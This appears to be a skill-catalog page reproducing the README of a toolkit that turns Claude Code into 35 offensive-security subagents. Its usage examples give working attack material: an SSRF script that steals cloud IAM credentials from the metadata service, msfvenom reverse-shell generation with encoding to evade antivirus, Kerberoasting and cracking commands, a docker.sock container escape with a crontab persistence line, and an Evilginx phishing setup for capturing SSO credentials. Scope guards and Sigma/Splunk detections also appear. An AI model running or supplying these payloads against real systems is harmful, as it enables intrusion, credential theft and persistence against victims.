Pentest Ai Agents

Name: Pentest Ai Agents
Author: aradotso

aradotso/security-skills

1.2k installs
8 repo stars
Updated July 16, 2026

pentest-ai-agents provides documented workflows for Claude Code subagents covering offensive security research, penetration testing planning, recon analysis, exploit research, detection engineering, and security reporting.


Pentest Ai Agents by the numbers

1,189 all-time installs (skills.sh)
+33 installs in the week ending Jul 28, 2026 (Skillselion tracking)
Ranked #253 of 2,066 Data Science & ML skills by installs in the Skillselion catalog
Security screen: CRITICAL risk (skills.sh audit)
Data as of Jul 28, 2026 (Skillselion catalog sync)

At a glance

pentest-ai-agents capabilities & compatibility

Use cases: documentation · planning

SKILL.md

npx skills add https://github.com/aradotso/security-skills --skill pentest-ai-agents

Security audit: 0 / 3 scanners passed

How do I use pentest-ai-agents for the task described in its SKILL.md triggers?

Claude Code subagents for offensive security research, penetration testing planning, recon analysis, exploit research, detection engineering, and security reporting

Who is it for?

Teams invoking pentest-ai-agents when the user request matches documented triggers and prerequisites.

Skip if: cached docs are missing, the request is a negative trigger, or another sibling skill owns the workflow.

What you get

Step-by-step guidance grounded in pentest-ai-agents documentation and reference files.

Penetration test plan
Detection rules
Penetration test report

By the numbers

Includes 35 offensive security subagents
Documented triggers cover nmap, BloodHound, STIG compliance, and pentest reporting

pentest-ai-agents

Skill by ara.so — Security Skills collection.

pentest-ai-agents transforms Claude Code into an offensive security research assistant through 35 specialized subagents. Each agent carries deep domain knowledge in specific areas: recon, web testing, Active Directory, cloud security, mobile/wireless pentesting, social engineering, payload crafting, reverse engineering, exploit chaining, detection engineering, and forensics.

The agents route automatically based on task description—no manual agent selection needed. They understand 80+ offensive security tools (nmap, nuclei, BloodHound, Impacket, Sliver, Ghidra, etc.) and can plan engagements, analyze recon data, research exploits, chain attacks, build detections, and write reports.

Installation

Quick Install (Recommended)

curl -fsSL https://raw.githubusercontent.com/0xSteph/pentest-ai-agents/main/install.sh | bash

This copies agent files to ~/.claude/agents/ and is idempotent (safe to re-run for updates).

Manual Clone and Install

git clone https://github.com/0xSteph/pentest-ai-agents.git
cd pentest-ai-agents

# Install agents globally for all projects
./install.sh --global

# Or install for current project only
./install.sh --project

# Use Haiku for advisory agents (lower cost)
./install.sh --global --lite

# Also install underlying CLI tools (nmap, nuclei, ffuf, etc.)
./install.sh --tools

The --tools flag installs underlying offensive security tools via apt/brew/pacman + pipx/go/cargo.

Installation Modes

Flag	Behavior
`--global`	Install to `~/.claude/agents/` (all projects)
`--project`	Install to `.claude/agents/` (current project)
`--lite`	Use Haiku for Tier 1 advisory agents (cost optimization)
`--tools`	Install underlying tools (nmap, nuclei, BloodHound, etc.)

Agent Architecture

Tier 1 vs Tier 2

Tier 1 (Advisory): Analyze data, plan engagements, recommend commands. Never execute tools directly. Examples: engagement-planner, exploit-guide, detection-engineer.
Tier 2 (Execution-capable): Can run tools with user approval and declared scope. Examples: recon-advisor, web-hunter, ad-attacker, payload-crafter.

All Tier 2 agents enforce scope guards—they require explicit engagement scope declaration and refuse out-of-scope actions.

Agent Categories

Planning & OSINT:
  - engagement-planner: Phased pentest plans with MITRE ATT&CK mappings
  - threat-modeler: STRIDE/DREAD threat modeling
  - opsec-anonymizer: Operator identity hygiene, source IP design
  - osint-collector: Domain recon, email harvesting, social profiling
  - recon-advisor: Parses nmap/nuclei/BloodHound, prioritizes targets

Vulnerability Discovery:
  - vuln-scanner: nuclei, nikto, nmap NSE, RouterSploit orchestration
  - web-hunter: ffuf, gobuster, sqlmap, dalfox, Commix
  - api-security: API testing (GraphQL, REST, gRPC)
  - bizlogic-hunter: Business logic flaws, race conditions, IDOR
  - bug-bounty: Bug bounty workflow optimization
  - llm-redteam: OWASP LLM Top 10, prompt injection, RAG poisoning

Infrastructure Attacks:
  - ad-attacker: BloodHound, Impacket, NetExec, Certipy, Kerberos abuse
  - cloud-security: AWS/Azure/GCP misconfig, SCPs, IAM abuse
  - cicd-redteam: Pipeline exploitation, artifact poisoning
  - container-breakout: Docker/K8s escape, runc/cri-o CVEs, RBAC abuse

Specialized Domains:
  - mobile-pentester: Frida, Objection, jadx, MobSF
  - wireless-pentester: aircrack-ng, hcxtools, bettercap
  - social-engineer: Social engineering campaigns
  - phishing-operator: GoPhish, Evilginx, dnstwist

Post-Exploitation:
  - privesc-advisor: Linux/Windows privilege escalation
  - c2-operator: Sliver/Mythic/Havoc/Cobalt Strike profiles
  - payload-crafter: msfvenom, Donut, custom loaders
  - swarm-orchestrator: Multi-agent attack coordination

Analysis & Reverse Engineering:
  - reverse-engineer: Ghidra, Radare2, Binwalk, dnSpy
  - malware-analyst: Volatility 3, YARA, sandbox analysis
  - forensics-analyst: Incident response, memory/disk analysis
  - ctf-solver: CTF challenge solver (crypto, stego, pwn, web)

Exploit Development:
  - exploit-chainer: Multi-step attack composition
  - attack-planner: Attack graph generation, path optimization
  - poc-validator: Exploit proof-of-concept validation
  - credential-tester: Hydra, Hashcat, credential stuffing

Defense & Reporting:
  - detection-engineer: Sigma, Splunk SPL, Elastic KQL, Sentinel KQL
  - stig-analyst: DISA STIG compliance auditing
  - report-generator: Executive summaries, technical findings, CVSS scoring

Core Commands

Interactive Routing

Once installed, just describe your task in Claude Code:

"Plan an internal pentest for a 500-endpoint AD environment, 2-week window."
"I have a domain user, where do I look first in BloodHound?"
"Convert this SharpHound EXE into shellcode for an EDR test."
"Run a phishing simulation against acme-corp.com."
"Reverse this firmware image and analyze the crypto protocol."

Claude routes to the appropriate specialist automatically.

Slash Commands

# Get agent recommendation + concrete next commands
/recommend "phish a small SaaS team's IT department"

# Filter agents by domain
/agents-for web
/agents-for cloud
/agents-for active-directory

# List all agents
/agents

Tool Audit

Check which underlying tools are installed:

# Audit all tools grouped by agent
bash db/doctor.sh

# Audit specific agent's toolchain
bash db/doctor.sh --agent ad-attacker

# Machine-readable output
bash db/doctor.sh --json

Output shows ✔ (installed) or ✘ (missing) per tool with install hints.
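
The installed/missing check itself is simple to reason about. The following is a minimal sketch of the idea in Python, not the contents of db/doctor.sh; the `TOOLCHAINS` mapping and the `audit_tools` helper are hypothetical names, and the binaries listed are taken from the agent descriptions above.

```python
import shutil

# Hypothetical mapping of agent name -> CLI binaries it relies on.
TOOLCHAINS = {
    "recon-advisor": ["nmap", "nuclei"],
    "web-hunter": ["ffuf", "gobuster", "sqlmap"],
}

def audit_tools(toolchains, which=shutil.which):
    """Return {agent: {tool: bool}}, where True means the binary is on PATH."""
    return {
        agent: {tool: which(tool) is not None for tool in tools}
        for agent, tools in toolchains.items()
    }

if __name__ == "__main__":
    for agent, tools in audit_tools(TOOLCHAINS).items():
        print(agent)
        for tool, present in tools.items():
            print(f"  {'✔' if present else '✘'} {tool}")
```

Passing `which` as a parameter keeps the lookup replaceable, which makes the function easy to exercise without installing anything.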

Findings Database

Track engagement findings in persistent SQLite:

# Initialize new engagement
bash findings.sh init acme-corp-2026

# Add a finding (auto-routed from agent output)
bash findings.sh add --severity critical --title "Domain Admin in Kerberoastable SPN" \
  --description "SVC_SQL account has adminCount=1 and servicePrincipalName set" \
  --cve CVE-2022-12345 --cvss 8.8 --host dc01.acme.local --tool bloodhound

# Show engagement stats
bash findings.sh stats

# Export findings as JSON
bash findings.sh export

# Export as Markdown report
bash findings.sh export --format md

Schema includes cve, tool_used, mitre_attack, remediation columns.
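
To illustrate how those columns might fit together, here is a minimal sketch using Python's built-in sqlite3 module. Only cve, tool_used, mitre_attack, and remediation are named in the docs; the table name `findings`, the other columns, and the `add_finding` and `stats` helpers are assumptions modelled on the `findings.sh add` flags, not the project's actual schema.

```python
import sqlite3

# Assumed schema: only cve, tool_used, mitre_attack and remediation come from the docs.
SCHEMA = """
CREATE TABLE IF NOT EXISTS findings (
    id           INTEGER PRIMARY KEY,
    severity     TEXT NOT NULL,
    title        TEXT NOT NULL,
    description  TEXT,
    cve          TEXT,
    cvss         REAL,
    host         TEXT,
    tool_used    TEXT,
    mitre_attack TEXT,
    remediation  TEXT
)
"""

def add_finding(conn, **fields):
    """Insert one finding; values are bound as named parameters.

    Column names come from the keyword arguments, so callers must pass
    only trusted, known column names.
    """
    cols = ", ".join(fields)
    params = ", ".join(f":{name}" for name in fields)
    cur = conn.execute(f"INSERT INTO findings ({cols}) VALUES ({params})", fields)
    conn.commit()
    return cur.lastrowid

def stats(conn):
    """Count findings per severity."""
    rows = conn.execute("SELECT severity, COUNT(*) FROM findings GROUP BY severity")
    return dict(rows.fetchall())

conn = sqlite3.connect(":memory:")
conn.execute(SCHEMA)
add_finding(conn, severity="critical", title="Domain Admin in Kerberoastable SPN",
            host="dc01.acme.local", tool_used="bloodhound", mitre_attack="T1558.003")
add_finding(conn, severity="low", title="Verbose server banner", host="10.10.10.50")
print(stats(conn))
```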

Session Handoffs

Generate handoff reports between work sessions:

bash handoff.sh

Produces Markdown with: what was accomplished, current state, immediate next actions, blockers.

Configuration

Environment Variables

# Anthropic API key (required)
export ANTHROPIC_API_KEY="sk-ant-..."

# Optional: Model overrides
export PENTEST_TIER1_MODEL="claude-3-5-haiku-20241022"  # Advisory agents
export PENTEST_TIER2_MODEL="claude-3-7-sonnet-20250219" # Execution agents

# Optional: Findings database path
export PENTEST_FINDINGS_DB="$HOME/.pentest/findings.db"

# Optional: Tool installation preferences
export PENTEST_PACKAGE_MANAGER="apt"  # apt, brew, pacman, yum

Scope Declaration (Tier 2 Agents)

Tier 2 agents require explicit scope before executing tools:

# In Claude Code, declare scope first:
"Engagement scope: 10.10.10.0/24, acme-corp.com, authorized by Jane Doe <jane@acme.com>, 2026-05-01 to 2026-05-15"

# Then request actions:
"Run full port scan on 10.10.10.0/24"
"Enumerate SMB shares on discovered hosts"

Agents refuse actions outside declared IP ranges, domains, and time windows.
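
The refusal rule above amounts to three checks: IP range, domain, and time window. The sketch below shows one way such a guard could be expressed, assuming the scope has already been parsed into structured values; the `Scope` class and `in_scope` function are hypothetical and are not taken from the agents' implementation.

```python
import ipaddress
from dataclasses import dataclass
from datetime import date

@dataclass(frozen=True)
class Scope:
    networks: tuple   # ipaddress network objects
    domains: tuple    # lower-case domain names
    start: date
    end: date

def in_scope(scope, target, today):
    """Return True only if both the date and the target fall inside the declared scope."""
    if not (scope.start <= today <= scope.end):
        return False
    try:
        addr = ipaddress.ip_address(target)
    except ValueError:
        # Not an IP literal: treat it as a hostname and match the domain or a subdomain.
        host = target.lower().rstrip(".")
        return any(host == d or host.endswith("." + d) for d in scope.domains)
    return any(addr in net for net in scope.networks)

# Values from the example scope declaration above.
scope = Scope(
    networks=(ipaddress.ip_network("10.10.10.0/24"),),
    domains=("acme-corp.com",),
    start=date(2026, 5, 1),
    end=date(2026, 5, 15),
)
```

Matching on `"." + d` rather than a bare suffix keeps lookalike names such as `evilacme-corp.com` out of scope.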

Hard Refusal List

All agents enforce scope guards that refuse:

Denial of Service (DoS/DDoS)
Mass internet scanning
Unattended worm/ransomware propagation
False-flag operations
Safety-of-life system targeting (medical, industrial control)

Usage Patterns

Engagement Planning

# In Claude Code:
"Plan a 2-week external pentest for fintech-startup.io. Assume no prior credentials. Focus on web app, API, and cloud infrastructure."

engagement-planner produces:

Phased timeline (recon → initial access → privilege escalation → lateral movement → exfil simulation)
MITRE ATT&CK technique mappings per phase
Tool recommendations with time estimates
ROE template with emergency contacts

Recon and Target Prioritization

# Run recon tools (outside Claude):
nmap -sV -sC -oA acme-scan 10.10.10.0/24
nuclei -l hosts.txt -severity critical,high -json -o nuclei.json

# In Claude Code:
"Analyze acme-scan.xml and nuclei.json. Prioritize targets for initial access."

recon-advisor (Tier 2):

1. Parses XML/JSON
2. Groups findings by host and severity
3. Recommends attack paths (e.g., "10.10.10.50: outdated Apache with a known CVE")
4. Suggests next commands:

   ffuf -u http://10.10.10.50/FUZZ -w /usr/share/wordlists/dirb/common.txt
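
The parse-and-group steps can be pictured with a short sketch. With `-oA acme-scan`, nmap writes its XML report to acme-scan.xml; the code below reads that format with Python's standard library and groups open ports by host. The `open_services` function and the `SAMPLE` document are illustrative assumptions, not the agent's own parser.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

def open_services(nmap_xml):
    """Map each host address to (port, service, product, version) tuples for open ports."""
    root = ET.fromstring(nmap_xml)
    result = defaultdict(list)
    for host in root.iter("host"):
        address = host.find("address")  # first <address> element of the host
        if address is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            result[address.get("addr")].append((
                int(port.get("portid")),
                svc.get("name", "") if svc is not None else "",
                svc.get("product", "") if svc is not None else "",
                svc.get("version", "") if svc is not None else "",
            ))
    return dict(result)

# Made-up sample in the shape of nmap's XML output.
SAMPLE = """<nmaprun>
  <host>
    <address addr="10.10.10.50" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.49"/></port>
      <port protocol="tcp" portid="23"><state state="closed"/></port>
    </ports>
  </host>
</nmaprun>"""

print(open_services(SAMPLE))
```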

Active Directory Attack Chains

# After obtaining BloodHound JSON:
"I have domain user alice@acme.local. BloodHound data is in ./bloodhound/. Show me paths to Domain Admins and recommend attacks."

ad-attacker:

Runs bloodhound-python or parses existing JSON
Identifies: Kerberoastable accounts, AS-REP roastable users, constrained delegation, ACL abuse paths
Generates command sequences:

  GetUserSPNs.py acme.local/alice:password -dc-ip 10.10.10.5 -request -outputfile spns.txt
  hashcat -m 13100 spns.txt /usr/share/wordlists/rockyou.txt

Exploit Chaining

"I found SSRF in the /admin/debug endpoint and read /etc/passwd. Next steps to get a shell?"

exploit-chainer:

1. Validates SSRF → file read primitive
2. Recommends: SSRF → internal service enumeration → cloud metadata (if AWS/Azure/GCP)
3. Chains: SSRF to 169.254.169.254 → IAM role credentials → S3 bucket access → RCE via Lambda
4. Provides POC code:

   import requests
   url = "https://target.com/admin/debug?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
   roles = requests.get(url).text.split('\n')
   creds = requests.get(f"{url}{roles[0]}").json()
   print(creds['AccessKeyId'], creds['SecretAccessKey'], creds['Token'])

Payload Crafting and Evasion

"Generate a Windows reverse shell payload for 10.10.10.50:443, encode it to evade AV, and convert to shellcode for process injection."

payload-crafter:

# Stage 1: Generate payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.50 LPORT=443 -f exe -o payload.exe

# Stage 2: Convert to shellcode with Donut
donut -a 2 -f 1 payload.exe -o payload.bin

# Stage 3: Encode shellcode (XOR + base64)
python3 << 'EOF'
with open('payload.bin', 'rb') as f:
    sc = f.read()
xor_sc = bytes([b ^ 0xAA for b in sc])
import base64
print(base64.b64encode(xor_sc).decode())
EOF

# Stage 4: Inject via process hollowing (C# template provided)

Includes AMSI bypass snippets and ETW patching patterns.

Detection Engineering

"We just tested Kerberoasting against SVC_SQL. Build Sigma and Splunk detection rules."

detection-engineer:

# Sigma rule (kerberoasting.yml)
title: Kerberoasting TGS Request
status: experimental
logsource:
  product: windows
  service: security
detection:
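  selection:
    EventID: 4769
    TicketOptions: '0x40810000'
  # Exclude machine accounts (names ending in '$') and krbtgt: both produce routine ticket requests
  filter_machine_accounts:
    ServiceName|endswith: '$'
  filter_krbtgt:
    ServiceName|startswith: 'krbtgt'
  condition: selection and not 1 of filter_*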
falsepositives:
  - Legitimate service account access
level: medium
tags:
  - attack.credential_access
  - attack.t1558.003

# Splunk SPL
index=windows EventCode=4769 Ticket_Options=0x40810000 NOT Service_Name="*$" NOT Service_Name="krbtgt*"
| stats count by src_ip, Account_Name, Service_Name
| where count > 5
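
The `stats count by ... | where count > 5` stage is a plain threshold over grouped events. As a rough sketch of the same logic outside Splunk, assuming the matched events have been exported as dictionaries keyed by the SPL field names (the `over_threshold` helper is hypothetical):

```python
from collections import Counter

def over_threshold(events, threshold=5):
    """Group events by (src_ip, Account_Name, Service_Name) and keep groups with count > threshold."""
    counts = Counter(
        (ev["src_ip"], ev["Account_Name"], ev["Service_Name"]) for ev in events
    )
    return {key: n for key, n in counts.items() if n > threshold}

# Made-up events: one source requests the same service ticket six times, another once.
noisy = [{"src_ip": "10.10.10.77", "Account_Name": "alice", "Service_Name": "SVC_SQL"}] * 6
quiet = [{"src_ip": "10.10.10.12", "Account_Name": "bob", "Service_Name": "SVC_WEB"}]
print(over_threshold(noisy + quiet))
```

The threshold of 5 comes from the search above; a suitable value depends on how much legitimate ticket traffic the environment produces.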

Reverse Engineering Firmware

"Analyze router-firmware.bin and extract the encryption keys."

reverse-engineer:

# Extract filesystem
binwalk -e router-firmware.bin

# Identify architecture
file _router-firmware.bin.extracted/squashfs-root/bin/httpd
# Output: ELF 32-bit LSB MIPS

# Load into Ghidra (headless mode)
analyzeHeadless /tmp/ghidra_project router_fw -import _router-firmware.bin.extracted/squashfs-root/bin/httpd -postScript FindCryptoKeys.java

# Search for hardcoded keys
strings -n 16 httpd | grep -E '^[A-Fa-f0-9]{32,}$'

Provides Ghidra Python scripts for automated key extraction from common crypto libraries (OpenSSL, mbedTLS).

Phishing Campaign Setup

"Set up a phishing campaign for acme-corp.com employees. Clone their SSO login page and capture credentials with session cookies."

phishing-operator:

# 1. Register lookalike domain
# Manual: acme-sso.com (or use dnstwist suggestions)
dnstwist acme-corp.com --registered | head -10

# 2. Clone SSO page
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent https://sso.acme-corp.com/login

# 3. Deploy Evilginx
evilginx2 -p ./phishlets
# Configure phishlet for acme-corp SSO (example phishlet config provided)

# 4. Track campaign in GoPhish
# Import targets, attach cloned template, set sending profile

Includes SMTP relay setup, domain reputation warming, and email header crafting to evade SPF/DKIM/DMARC.

CTF Challenges

"Solve this CTF crypto challenge: ciphertext is 'Xq3mK9...' and we have a PCAP with TLS handshake."

ctf-solver:

1. Identifies cipher type (frequency analysis suggests substitution)
2. Tries automated solvers: dcode.fr substitution, quipqiup
3. Extracts TLS pre-master secret from PCAP via Wireshark
4. Decrypts TLS stream:

   tshark -r capture.pcap -o tls.keylog_file:sslkeylog.txt -Y http -T fields -e http.file_data

Covers crypto, steganography (zsteg, steghide), forensics, binary exploitation, web challenges.

Underlying Tools

Agents drive these tools (installable via install.sh --tools):

Recon: nmap, masscan, rustscan, subfinder, amass, httpx, theHarvester, sherlock, holehe, maigret
Web: ffuf, gobuster, feroxbuster, sqlmap, dalfox, Commix, dirsearch, whatweb
Vulnerability: nuclei, nikto, nmap NSE, RouterSploit
AD: BloodHound, Impacket, NetExec, Certipy, kerbrute, Responder
Credentials: Hydra, Hashcat, John, cupp, CeWL, Crunch, hashid, haiti
Cloud: aws-cli, azure-cli, gcloud, Trivy, Prowler, ScoutSuite, Pacu
Containers: kubectl, kube-hunter, peirates, CDK
C2: Sliver, Mythic, Havoc, Cobalt Strike
LLM: Garak, PyRIT, Promptfoo
Mobile: Frida, Objection, jadx, apktool, MobSF
Wireless: aircrack-ng, hcxdumptool, bettercap
Social: GoPhish, Evilginx, dnstwist
Payloads: msfvenom, Donut
RE: Ghidra, Radare2, Binwalk, dnSpy
Forensics: Volatility 3, exiftool, YARA, Wireshark

Run bash db/doctor.sh to audit installed tools.

Token Optimization

Model Selection

# Use Haiku for advisory agents (engagement-planner, exploit-guide, detection-engineer)
./install.sh --global --lite

# Or set manually:
export PENTEST_TIER1_MODEL="claude-3-5-haiku-20241022"
export PENTEST_TIER2_MODEL="claude-3-7-sonnet-20250219"

Cost comparison (per 1M tokens input):

Haiku: $0.80
Sonnet: $3.00

Tier 1 agents handle ~80% of interactions (planning, analysis, recommendations). Using Haiku for Tier 1 cuts costs by ~60% with minimal quality impact.
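
The ~60% figure can be checked with a quick blended-price calculation. This sketch assumes Tier 1's share of input tokens matches its ~80% share of interactions and ignores output-token pricing; neither assumption is stated in the docs.

```python
HAIKU_PER_M = 0.80    # USD per 1M input tokens, from the comparison above
SONNET_PER_M = 3.00
TIER1_SHARE = 0.80    # assumption: token share equals the ~80% interaction share

def blended_cost(tier1_share, tier1_price, tier2_price):
    """Average price per 1M input tokens across both tiers."""
    return tier1_share * tier1_price + (1 - tier1_share) * tier2_price

all_sonnet = blended_cost(TIER1_SHARE, SONNET_PER_M, SONNET_PER_M)
lite = blended_cost(TIER1_SHARE, HAIKU_PER_M, SONNET_PER_M)
savings = 1 - lite / all_sonnet

print(f"{lite:.2f} vs {all_sonnet:.2f} USD per 1M input tokens, {savings:.1%} saved")
```

Under these assumptions the blended price falls from 3.00 to 1.24 USD per 1M input tokens, a saving of roughly 59%, which is consistent with the ~60% claim.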

Context Management

Agents use structured tool output parsing to minimize repeated context:

# Instead of pasting full nmap XML into chat:
bash findings.sh import --file acme-scan.xml

# Agent queries SQLite directly:
SELECT host, port, service, version FROM scan_results WHERE severity='critical';

Reduces token usage by 10-50× for large scan outputs.
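
The saving comes from returning a handful of rows instead of the whole scan file. Here is a minimal sketch of that query pattern with Python's sqlite3 module; the column names come from the query above, while the column types, the sample rows, and the `rows_by_severity` helper are assumptions for illustration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# Assumed layout: column names come from the query above, the types are guesses.
conn.execute("""
    CREATE TABLE scan_results (
        host TEXT, port INTEGER, service TEXT, version TEXT, severity TEXT
    )
""")
# Made-up rows standing in for an imported scan.
conn.executemany(
    "INSERT INTO scan_results VALUES (?, ?, ?, ?, ?)",
    [
        ("10.10.10.50", 80, "http", "Apache httpd 2.4.49", "critical"),
        ("10.10.10.50", 22, "ssh", "OpenSSH 8.9", "info"),
        ("10.10.10.51", 445, "microsoft-ds", "", "high"),
    ],
)

def rows_by_severity(conn, severity):
    """Return only the matching rows, using a bound parameter for the severity."""
    cur = conn.execute(
        "SELECT host, port, service, version FROM scan_results WHERE severity = ?",
        (severity,),
    )
    return cur.fetchall()

critical = rows_by_severity(conn, "critical")
print(critical)
```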

Local Models (Experimental)

Run agents with local models via Ollama:

# Install Ollama
curl -fsSL https://ollama.com/install.sh | sh

# Pull model
ollama pull mixtral:8x7b

# Configure pentest-ai-agents
export PENTEST_LOCAL_MODEL="mixtral:8x7b"
export ANTHROPIC_API_KEY=""  # Disable cloud models

Tested models:

mixtral:8x7b: Good for Tier 1 advisory agents
llama3:70b: Comparable to Haiku for planning/analysis
codellama:34b: Decent for exploit POC generation

Limitations: Local models struggle with complex exploit chaining and detection rule generation. Recommend hybrid mode: local for Tier 1, Claude Sonnet for Tier 2.

Troubleshooting

Agent Not Routing

Symptom: Claude doesn't invoke the right agent for your task.

Fix: Be more explicit in task description:

# Vague
"Help with Active Directory"

# Specific
"I have a domain user. Analyze BloodHound data and recommend Kerberoasting attacks."

Or use slash commands:

/recommend "domain user to domain admin in AD environment"

Tools Not Found

Symptom: Agent recommends command, but tool isn't installed.

Fix:

# Audit missing tools
bash db/doctor.sh

# Install missing tools
./install.sh --tools

# Or install specific tool manually:
sudo apt install nmap
pipx install bloodhound

Scope Refusal

Symptom: Tier 2 agent refuses to run commands: "No engagement scope declared."

Fix: Declare scope first:

"Engagement scope: 10.10.10.0/24, testlab.local, authorized by Alice <alice@example.com>, 2026-05-01 to 2026-05-31"

Include: IP ranges, domains, authorizing party, time window.

Findings Database Locked

Symptom: database is locked error when adding findings.

Fix:

# Close any open findings.sh processes
pkill -f findings.sh

# Or use WAL mode (write-ahead logging):
sqlite3 ~/.pentest/findings.db "PRAGMA journal_mode=WAL;"
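
For scripts that open the database directly, the same setting can be applied from Python together with a busy timeout, so a writer waits for a lock instead of failing at once. This is a sketch using the standard sqlite3 module; `open_findings_db` is a hypothetical helper, and the demo runs against a throwaway file rather than the real findings database.

```python
import os
import sqlite3
import tempfile

def open_findings_db(path, busy_timeout_s=5.0):
    """Open the database with a busy timeout and switch it to WAL journaling."""
    # `timeout` makes sqlite3 wait for a lock instead of raising immediately.
    conn = sqlite3.connect(path, timeout=busy_timeout_s)
    mode = conn.execute("PRAGMA journal_mode=WAL;").fetchone()[0]
    return conn, mode

# Demonstrated on a temporary file; WAL mode does not apply to in-memory databases.
demo_path = os.path.join(tempfile.mkdtemp(), "findings-demo.db")
conn, mode = open_findings_db(demo_path)
print(mode)
```

The journal mode is stored in the database file, so it only needs to be set once per database.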

Out-of-Date Agent Knowledge

Symptom: Agent recommends deprecated tool or technique.

Fix: Update agents:

cd pentest-ai-agents
git pull
./install.sh --global

Agents track tool updates via community feedback. File issues for outdated recommendations.

Real-World Examples

Example 1: Full External Pentest Workflow

# Step 1: Plan engagement
# In Claude Code:
"Plan a 2-week external pentest for acme-corp.com. No credentials. Focus on web, API, cloud."

# engagement-planner produces timeline, ROE, tool list

# Step 2: OSINT recon
"Run OSINT on acme-corp.com. Find subdomains, employee emails, leaked credentials."

# osint-collector executes:
subfinder -d acme-corp.com -o subs.txt
amass enum -d acme-corp.com -o amass.txt
theHarvester -d acme-corp.com -b all -f harvest.json
# Searches breach databases (dehashed, etc.)

# Step 3: Vulnerability scanning
"Scan discovered hosts with nuclei for critical/high severity issues."

# vuln-scanner:
nuclei -l live-hosts.txt -severity critical,high -json -o nuclei.json

# Step 4: Prioritize targets
"Analyze nuclei.json. Which hosts are most likely to give initial access?"

# recon-advisor:
# 1. Parses JSON
# 2. Identifies: SSRF in admin panel, outdated WordPress, exposed Git repo
# 3. Recommends: "Target admin.acme-corp.com/debug (SSRF) for cloud metadata access"

# Step 5: Exploit SSRF
"Exploit SSRF at admin.acme-corp.com/debug to access AWS metadata and pivot to S3."

# exploit-chainer:
curl "https://admin.acme-corp.com/debug?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# Extracts AWS keys
aws s3 ls --profile stolen-creds
# Finds sensitive data bucket

# Step 6: Build detection
"Build Sigma and Splunk rules to detect SSRF to cloud metadata endpoints."

# detection-engineer:
# Produces Sigma rule + Splunk SPL + AWS CloudTrail query

# Step 7: Report
"Generate executive summary and technical findings report."

# report-generator:
# Outputs Markdown with CVSS scores, remediation steps, attack timeline

Example 2: AD Privilege Escalation from User to Domain Admin

# Starting point: domain user alice@corp.local

# Step 1: Enumerate AD
"I have alice@corp.local credentials. Enumerate AD and find paths to Domain Admins."

# ad-attacker:
bloodhound-python -u alice -p 'Password123' -d corp.local -dc dc01.corp.local -c All --zip
# Uploads to BloodHound GUI or parses JSON locally

# Step 2: Identify attack path
"Analyze BloodHound data. What's the shortest path to DA?"

# ad-attacker:
# Finds: alice → MemberOf → IT-Admins → GenericWrite → SVC_SQL → Kerberoastable → DA group

# Step 3: Execute attack chain
"Execute the attack chain: GenericWrite to add SPN, Kerberoast SVC_SQL, crack hash."

# ad-attacker:
# 1. Add SPN to SVC_SQL (GenericWrite abuse)
python3 addspn.py -u alice -p 'Password123' -t SVC_SQL -s HTTP/fake.corp.local corp.local/dc01

# 2. Kerberoast
GetUserSPNs.py corp.local/alice:Password123 -dc-ip dc01.corp.local -request -outputfile tgs.txt

# 3. Crack
hashcat -m 13100 tgs.txt rockyou.txt

# 4. Validate DA access
netexec smb dc01.corp.local -u SVC_SQL -p 'CrackedPassword' --shares

# Step 4: Build detection
"Build detection rules for GenericWrite SPN modification and Kerberoasting."

# detection-engineer:
# Sigma rule for Event ID 4742 (user object modified) + SPN change
# Splunk correlation for 4742 → 4769 (TGS request) within 5 minutes

Example 3: Container Escape to Host Root

# Starting point: Shell inside Docker container

# Step 1: Assess container environment
"I have a shell in a Docker container. Assess escape vectors."

# container-breakout:
# Checks: privileged flag, host PID namespace, mounted /var/run/docker.sock, capabilities

# Step 2: Exploit mounted docker.sock
"docker.sock is mounted. Exploit it to escape to host."

# container-breakout:
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host /bin/bash
# Now root on host

# Step 3: Persistence
"Establish persistence on the host as root."

# c2-operator:
# Recommends: cron job, systemd service, SSH key injection
echo "* * * * * root /tmp/.update.sh" >> /host/etc/crontab

# Step 4: Detection
"Build Falco rule to detect docker.sock abuse from containers."

# detection-engineer:
# Falco rule for container process accessing /var/run/docker.sock

Legal and Ethical Use

Authorized testing only. All agents enforce scope guards:

Require explicit engagement scope (IP ranges, domains, authorization, dates)
Refuse out-of-scope actions
Log all commands for audit trails

Hard refusals for:

Denial of Service
Mass internet scanning
Unattended worm propagation
False-flag operations
Safety-of-life systems (medical, ICS/SCADA)

Users are responsible for obtaining proper authorization before testing. pentest-ai-agents is a research and education tool. Unauthorized testing is illegal.

Contributing

Contributions welcome:

New agents (follow existing structure in agents/)
Tool integrations (add to db/tools.json)
Detection rules (expand detection-engineer ruleset)
Bug fixes and documentation improvements

See CONTRIBUTING.md for guidelines.

Resources

Documentation
INSTALL.md - Detailed installation guide
Agent Reference - Full agent descriptions
Tool Matrix - Tool coverage by agent
GitHub Issues - Report bugs, request features

License

MIT License - see LICENSE

How it compares

Pick this when Claude Code needs coordinated offensive-security subagents across recon, exploitation research, detections, and reporting rather than one generic security prompt.

FAQ

What does pentest-ai-agents do?

Claude Code subagents for offensive security research, penetration testing planning, recon analysis, exploit research, detection engineering, and security reporting

Is Pentest Ai Agents safe to install?

skills.sh reports 0 of 3 security scanners passed. Review the Security Audits panel on this page before installing in production.
